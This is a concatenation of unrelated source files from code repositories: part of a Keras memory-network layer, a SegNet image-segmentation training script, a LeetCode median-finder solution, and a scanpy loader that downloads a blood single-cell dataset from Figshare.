self.trainable_weights += [self.B]
# Temporal embedding
self.Te = self.emb_init((self.input_length, self.output_dim))
self.trainable_weights += [self.Te]
def get_output(self, train=False):
inputs = [layer.get_output(train) for layer in self.layers]
facts, question = inputs
# WARN make sure input layers are Embedding layers with identity init
# facts = K.argmax(facts, axis=-1)
# question = K.argmax(question, axis=-1)
u, mask_q = self.lookup(question, self.B, 1) # just 1 question
for A, C in zip(self.memory, self.outputs):
m, mask_m = self.lookup(facts, A, self.memory_length)
c, mask_c = self.lookup(facts, C, self.memory_length)
# attention weights
p = self.attention(m, u, mask_m)
# output
o = self.calc_output(c, p)
u = o + u
# u = K.dot(u[:, 0, :], self.W) + self.b
return u[:, 0, :] # K.softmax(u)
def lookup(self, x, W, memory_length):
# shape: (batch*memory_length, input_length)
x = K.cast(K.reshape(x, (-1, self.input_length)), 'int32')
mask = K.expand_dims(K.not_equal(x, 0.), dim=-1)
# shape: (batch*memory_length, input_length, output_dim)
X = K.gather(W, x)
if self.bow_mode == "bow":
# shape: (batch*memory_length, output_dim)
X = K.sum(X + K.expand_dims(self.Te, 0), axis=1)
# shape: (batch, memory_length, output_dim)
X = K.reshape(X, (-1, memory_length, self.output_dim))
return X, mask
def attention(self, m, q, mask):
# mask original shape is (batch*memory_length, input_length, 1)
# shape (batch, memory)
mask = K.reshape(mask[:, 0], (-1, self.memory_length))
# shape: (batch, memory_length, 1)
p = T.batched_tensordot(m, q, (2, 2))
# shape: (batch, memory_length)
p = K.softmax(p[:, :, 0]) # * K.cast(mask, 'float32')
# shape: (batch, 1, memory_length)
return K.expand_dims(p, dim=1)
def calc_output(self, c, p):
# shape: (batch, memory_length, 1)
p = K.permute_dimensions(p, (0, 2, 1))
# shape: (batch, output_dim)
o = K.sum(c * p, axis=1)
# if self.mode == "rnn":
# import theano
# W = theano.printing.Print('[Debug] W shape: ', attrs=("shape",))(W)
# o = K.dot(o, W) + b
# shape: (batch, 1, output_dim)
return K.expand_dims(o, dim=1)
|
Segnet/训练.py | 1044197988/- | 186 | 22354 | #coding=utf-8
import matplotlib
matplotlib.use("Agg")
import tensorflow as tf
import argparse
import numpy as np
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Conv2D,MaxPooling2D,UpSampling2D,BatchNormalization,Reshape,Permute,Activation
from tensorflow.keras.utils import to_categorical
from tensorflow.keras.preprocessing.image import img_to_array
from tensorflow.keras.callbacks import ModelCheckpoint
from sklearn.preprocessing import LabelEncoder
from PIL import Image
import matplotlib.pyplot as plt
import cv2
import random
import os
from tqdm import tqdm
seed = 7
np.random.seed(seed)
# image size
img_w = 32
img_h = 32
# number of classes and the grey values used for them in the label masks
n_label=6
classes=[0.0,17.0,34.0,51.0,68.0,255.0]
labelencoder = LabelEncoder()
labelencoder.fit(classes)
# number of training epochs and batch size
EPOCHS = 5
BS = 32
# maximum pixel value, used for normalisation
divisor=255.0
# root path of the dataset
filepath = 'C:\\Users\\Administrator\\Desktop\\Project\\src\\'
# read an image and normalise it
def load_img(path, grayscale=False):
if grayscale:
img = cv2.imread(path,cv2.IMREAD_GRAYSCALE)
else:
img = cv2.imread(path)
img = np.array(img,dtype="float") / divisor
return img
# collect file names and split them into training and validation sets
def get_train_val(val_rate = 0.25):
train_url = []
train_set = []
val_set = []
for pic in os.listdir(filepath + 'train'):
train_url.append(pic)
random.shuffle(train_url)
total_num = len(train_url)
val_num = int(val_rate * total_num)
for i in range(len(train_url)):
if i < val_num:
val_set.append(train_url[i])
else:
train_set.append(train_url[i])
return train_set,val_set
# generator for training batches
def generateData(batch_size,data=[]):
while True:
train_data = []
train_label = []
batch = 0
for i in (range(len(data))):
url = data[i]
batch += 1
img = load_img(filepath + 'train/' + url)
img = img_to_array(img)
train_data.append(img)
label = load_img(filepath + 'label/' + url, grayscale=True)
label = img_to_array(label).reshape((img_w * img_h,))
train_label.append(label)
if batch % batch_size==0:
train_data = np.array(train_data)
                train_label = np.array(train_label).flatten() # flatten
train_label = labelencoder.transform(train_label)
                train_label = to_categorical(train_label, num_classes=n_label) # one-hot encode the labels
train_label = train_label.reshape((batch_size,img_w,img_h,n_label))
yield (train_data,train_label)
train_data = []
train_label = []
batch = 0
# generator for validation batches
def generateValidData(batch_size,data=[]):
while True:
valid_data = []
valid_label = []
batch = 0
for i in (range(len(data))):
url = data[i]
batch += 1
img = load_img(filepath + 'train/' + url)
img = img_to_array(img)
valid_data.append(img)
label = load_img(filepath + 'label/' + url, grayscale=True)
label = img_to_array(label).reshape((img_w * img_h,))
valid_label.append(label)
if batch % batch_size==0:
valid_data = np.array(valid_data)
valid_label = np.array(valid_label).flatten()
valid_label = labelencoder.transform(valid_label)
valid_label = to_categorical(valid_label, num_classes=n_label)
valid_label = valid_label.reshape((batch_size,img_w,img_h,n_label))
yield (valid_data,valid_label)
valid_data = []
valid_label = []
batch = 0
# define the SegNet network
def SegNet():
model = Sequential()
#encoder
model.add(Conv2D(64,(3,3),strides=(1,1),input_shape=(img_w,img_h,3),padding='same',activation='relu',data_format='channels_last'))
model.add(BatchNormalization())
model.add(Conv2D(64,(3,3),strides=(1,1),padding='same',activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2,2)))
    #(16,16)  feature-map size for the 32x32 input (the original comments assumed 256x256)
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2,2)))
    #(8,8)
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
    #(4,4)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
    #(2,2)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(MaxPooling2D(pool_size=(2, 2)))
    #(1,1)
#decoder
model.add(UpSampling2D(size=(2,2)))
    #(2,2)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
    #(4,4)
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(512, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
    #(8,8)
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(256, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
    #(16,16)
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(128, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(UpSampling2D(size=(2, 2)))
    #(32,32)
model.add(Conv2D(64, (3, 3), strides=(1, 1), input_shape=(img_w, img_h,3), padding='same', activation='relu',data_format='channels_last'))
model.add(BatchNormalization())
model.add(Conv2D(64, (3, 3), strides=(1, 1), padding='same', activation='relu'))
model.add(BatchNormalization())
model.add(Conv2D(n_label, (1, 1), strides=(1, 1), padding='same'))
model.add(Activation('softmax'))
model.compile(loss='categorical_crossentropy',optimizer='sgd',metrics=['accuracy'])
model.summary()
return model
# training routine
def train(args):
model = SegNet()
    # tf.keras 2.x logs the metric as "accuracy"/"val_accuracy", so monitor that key
    modelcheck = ModelCheckpoint(args['model'],monitor='val_accuracy',save_best_only=True,mode='max')
    callbacks_list = [modelcheck,tf.keras.callbacks.TensorBoard(log_dir='.')]
train_set,val_set = get_train_val()
train_numb = len(train_set)
valid_numb = len(val_set)
print ("the number of train data is",train_numb)
print ("the number of val data is",valid_numb)
H = model.fit(x=generateData(BS,train_set),steps_per_epoch=(train_numb//BS),epochs=EPOCHS,verbose=2,
                  validation_data=generateValidData(BS,val_set),validation_steps=(valid_numb//BS),callbacks=callbacks_list)
# plot the training loss and accuracy
plt.style.use("ggplot")
plt.figure()
N = EPOCHS
plt.plot(np.arange(0, N), H.history["loss"], label="train_loss")
plt.plot(np.arange(0, N), H.history["val_loss"], label="val_loss")
plt.plot(np.arange(0, N), H.history["acc"], label="train_acc")
plt.plot(np.arange(0, N), H.history["val_acc"], label="val_acc")
plt.title("Training Loss and Accuracy on SegNet Satellite Seg")
plt.xlabel("Epoch #")
plt.ylabel("Loss/Accuracy")
plt.legend(loc="lower left")
plt.savefig(args["plot"])
# parse command-line arguments
def args_parse():
# construct the argument parse and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-a", "--augment", help="using data augment or not",
action="store_true", default=False)
ap.add_argument("-m", "--model", required=False,default="segnet.h5",
help="path to output model")
ap.add_argument("-p", "--plot", type=str, default="plot.png",
help="path to output accuracy/loss plot")
args = vars(ap.parse_args())
return args
# entry point
if __name__=='__main__':
args = args_parse()
train(args)
print("完成")
#predict()
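# Example invocation (illustrative, not from the original script): assuming images in
# <filepath>/train and same-named label masks in <filepath>/label,
#   python 训练.py --model segnet.h5 --plot plot.png
# trains for EPOCHS epochs, keeps the best checkpoint by validation accuracy and
# saves the loss/accuracy curves to plot.png.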
|
Python/295. FindMedianFromDataStream.py | nizD/LeetCode-Solutions | 263 | 22355 | <reponame>nizD/LeetCode-Solutions<filename>Python/295. FindMedianFromDataStream.py<gh_stars>100-1000
"""
Problem:
--------
Design a data structure that supports the following two operations:
- `void addNum(int num)`: Add an integer from the data stream to the data structure.
- `double findMedian()`: Return the median of all elements so far.
"""
class MedianFinder:
def __init__(self):
"""
Initialize your data structure here.
"""
self.list = []
def addNum(self, num: int) -> None:
        # Traverse the list and insert `num` before the first element it exceeds.
        # This keeps the list sorted in descending order at all times.
for i in range(len(self.list)):
if num > self.list[i]:
self.list.insert(i, num)
return
# If `num` is the largest element or is the first one to be added
self.list.append(num)
def findMedian(self) -> float:
# Find index of the middle element (floor division by 2)
mid_index = len(self.list) // 2
if len(self.list) % 2 == 0:
# If number of elements = EVEN
# Return average of the middle 2 elements
return (self.list[mid_index - 1] + self.list[mid_index]) / 2
else:
# If number of elements = ODD
# Return the middle element
return self.list[mid_index]
# Your MedianFinder object will be instantiated and called as such:
# obj = MedianFinder()
# obj.addNum(num)
# param_2 = obj.findMedian()
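# A quick worked example (assuming the class above):
#   mf = MedianFinder()
#   mf.addNum(1)
#   mf.addNum(2)
#   print(mf.findMedian())  # 1.5
#   mf.addNum(3)
#   print(mf.findMedian())  # 2.0
# Note: list insertion makes addNum O(n); the classic two-heap approach would give
# O(log n) inserts, but that is an alternative design, not what is implemented above.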
|
openproblems/data/human_blood_nestorowa2016.py | bendemeo/SingleCellOpenProblems | 134 | 22356 | from . import utils
import os
import scanpy as sc
import scprep
import tempfile
URL = "https://ndownloader.figshare.com/files/25555751"
@utils.loader
def load_human_blood_nestorowa2016(test=False):
"""Download Nesterova data from Figshare."""
if test:
# load full data first, cached if available
adata = load_human_blood_nestorowa2016(test=False)
# Subsample data
adata = adata[:, :500].copy()
utils.filter_genes_cells(adata)
sc.pp.subsample(adata, n_obs=500)
# Note: could also use 200-500 HVGs rather than 200 random genes
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
else:
with tempfile.TemporaryDirectory() as tempdir:
filepath = os.path.join(tempdir, "human_blood_nestorowa2016.h5ad")
scprep.io.download.download_url(URL, filepath)
adata = sc.read(filepath)
# Ensure there are no cells or genes with 0 counts
utils.filter_genes_cells(adata)
return adata
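# Usage sketch (illustrative; in practice this loader is normally invoked through
# the openproblems dataset machinery rather than called directly):
#   adata = load_human_blood_nestorowa2016(test=True)   # small subsampled AnnData for quick tests
#   adata = load_human_blood_nestorowa2016()             # full AnnData downloaded from Figshare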
|